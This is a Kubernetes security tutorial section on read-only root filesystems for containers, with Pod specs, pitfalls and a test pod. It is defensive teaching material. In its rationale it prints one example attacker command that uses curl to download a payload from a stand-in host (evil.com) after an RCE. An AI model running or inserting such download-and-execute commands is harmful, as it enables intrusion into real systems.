43.3 Read-Only Root Filesystems for Containers

Right, let’s talk about making your containers less of a liability. You’ve probably heard the phrase “defense in depth” until you’re sick of it. I get it. But this is one of those beautifully simple, “why wouldn’t you?” layers. The idea: if a process inside your container has no business writing to the filesystem, don’t let it. At all. This isn’t just about protecting your precious application code; it’s about neutering a huge attack vector. If an attacker breaks in, they can’t overwrite your binaries, drop tools into system paths, or leave anything behind outside the few writable mounts you’ve explicitly granted. It turns a potential nightmare into a far more contained nuisance.

Now, before you get too excited, let’s be honest: this will break your application if you just slap it on without a thought. Most apps do need to write somewhere. The trick isn’t to make the entire container read-only; that’s a rookie mistake. The trick is to make the root filesystem (/) read-only and then explicitly allow writes only to the specific directories that absolutely need it, using volumes. This is the core of the practice.

The Basic Implementation

Here’s how you do it in a Pod spec. You’ll set readOnlyRootFilesystem: true in the container’s security context. Notice I said container, not Pod. This is a per-container setting, which is great because you can lock down your main app container while leaving any sidecars that need to write (like a logging agent) to their own devices.

```
apiVersion: v1
kind: Pod
metadata:
  name: my-locked-down-app
spec:
  containers:
  - name: app
    image: my-app:latest
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: temp-storage
      mountPath: /tmp
    - name: app-cache
      mountPath: /app/cache
  volumes:
  - name: temp-storage
    emptyDir: {}
  - name: app-cache
    emptyDir: {}
```

See what we did there? The root (/) is now read-only. But we’ve given the container two volumes it can write to: /tmp and /app/cache. This is the pattern. You’re not saying “no writing”; you’re saying “you may only write here, and I’m watching you.”
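
The per-container point is easier to see in a manifest. Here is a minimal sketch, assuming a hypothetical log-agent sidecar (its name and the my-log-agent:latest image are invented for illustration): the app container is locked down, while the sidecar omits the setting and keeps the default writable root.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: my-app-with-sidecar          # hypothetical name
spec:
  containers:
  - name: app
    image: my-app:latest
    securityContext:
      readOnlyRootFilesystem: true   # applies to this container only
    volumeMounts:
    - name: temp-storage
      mountPath: /tmp
  - name: log-agent                  # hypothetical sidecar
    image: my-log-agent:latest       # placeholder image
    # No readOnlyRootFilesystem here, so this container keeps the
    # default (false) and its root filesystem stays writable.
  volumes:
  - name: temp-storage
    emptyDir: {}
```

Once you know which paths the sidecar actually writes to, it can get the same treatment.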

The Devil’s in the Details (aka Common Pitfalls)

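This is where everyone gets tripped up. You enable this, your Pod crashes with a “Read-only file system” error, and you’re tempted to just disable it. Don’t. Diagnose: the error usually names the path the app tried to write, and that path tells you which volume you’re missing.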

Temporary Files (/tmp): This is the biggest offender. Plenty of language runtimes and libraries casually drop files in /tmp without asking (the JVM’s hsperfdata directory is a classic). Your app might not even know it’s happening. The fix is easy: mount an emptyDir volume at /tmp, as shown above. It’s a band-aid, but a necessary one.
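Secret Injection: This one is subtle, but not in the way people expect. A Secret volume is populated by the kubelet and mounted into the container as a separate, tmpfs-backed mount, and the ..data symlink that handles rotation lives inside that volume. None of it touches the container’s root filesystem, so readOnlyRootFilesystem does not break injection. What does bite you is where you mount it. Mount a volume over a directory the image already populates, like /app, and the volume hides everything the image shipped there. The solution? Give secrets a dedicated directory of their own. And be wary of subPath as a way to drop a single file into an existing directory: subPath mounts don’t receive updates when the Secret changes.
```
volumeMounts:
- name: secret-volume
  mountPath: /app/secrets  # Dedicated directory; the image's /app contents stay visible
  readOnly: true
# ... vs the problematic way ...
volumeMounts:
- name: secret-volume
  mountPath: /app  # This hides everything the image ships in /app!
  readOnly: true
```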
Application Logs: If your application writes its logs to a file inside the container (e.g., /app/logs/app.log), that’s now broken. The right answer is almost always to ditch files and log to stdout/stderr, letting the container runtime and your log shipper (e.g., Fluentd) handle it. If you must use a log file, you must mount a volume for its location.
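
Put together, the fixes for these pitfalls might look like the Pod spec fragment below. Treat it as a sketch: the volume names, the Secret name (my-app-secret), the /app/logs path, and the size limits are all assumptions for illustration. medium and sizeLimit are standard emptyDir fields, but the values need to fit your workload.

```yaml
spec:
  containers:
  - name: app
    image: my-app:latest
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: temp-storage
      mountPath: /tmp               # scratch space for runtimes and libraries
    - name: secret-volume
      mountPath: /app/secrets       # secrets get their own directory
      readOnly: true
    - name: app-logs
      mountPath: /app/logs          # only if logging to stdout is not an option
  volumes:
  - name: temp-storage
    emptyDir:
      medium: Memory                # tmpfs-backed; counts against memory limits
      sizeLimit: 64Mi               # assumed cap, tune per app
  - name: secret-volume
    secret:
      secretName: my-app-secret     # hypothetical Secret name
  - name: app-logs
    emptyDir:
      sizeLimit: 256Mi              # assumed cap, tune per app
```

Capping each emptyDir keeps the writable area small, which is the whole point of the exercise.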

Why This Actually Works

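The beauty of this isn’t just that it prevents writes. It’s that it shrinks what an attacker can do with a foothold. Imagine an attacker finds an RCE vulnerability in your app. Their first move is almost always to download a payload (curl -o /tmp/malicious https://evil.com/malicious) and then execute it. On a fully read-only filesystem, that curl -o fails instantly. If you mounted a writable /tmp, as in the example above, the download can still land there, so be honest about what you’re getting: the attacker can’t touch your application code, binaries, or shared libraries, and anything they write is confined to the handful of volumes you allowed. Keep those mounts few and small. It’s a strong containment layer, not a complete one.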
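
Writes to the root filesystem and writes to mounted volumes are separate matters, and a throwaway Pod makes the boundary visible. This is a sketch, assuming the public busybox image is pullable in your cluster; the Pod name and the probe file names are made up.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: ro-root-probe               # hypothetical name
spec:
  restartPolicy: Never
  containers:
  - name: probe
    image: busybox
    command: ["sh", "-c"]
    args:
    - |
      # Try one write on the root filesystem and one on the mounted volume.
      touch /probe     && echo "root write: allowed" || echo "root write: blocked"
      touch /tmp/probe && echo "tmp write: allowed"  || echo "tmp write: blocked"
    securityContext:
      readOnlyRootFilesystem: true
    volumeMounts:
    - name: temp-storage
      mountPath: /tmp
  volumes:
  - name: temp-storage
    emptyDir: {}
```

After the Pod finishes, kubectl logs ro-root-probe should report the root write as blocked and the /tmp write as allowed. Flip readOnlyRootFilesystem to false and both writes should go through.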

When to Avoid It (Be Pragmatic)

Don’t be a zealot. Some containers are basically designed to be interactive shells or need to write all over the place (looking at you, some legacy apps). A toolbox image where you expect to apt-get install things on the fly obviously requires a writable filesystem. For these, you leave this setting off. Note that ephemeral containers added with kubectl debug bring their own filesystem, so debugging alone is no reason to loosen the app container. The goal is to apply it to the vast majority of your stateless, functional application containers where the only writes should be to explicitly defined, closely watched volumes. It’s about reducing your attack surface, one container at a time.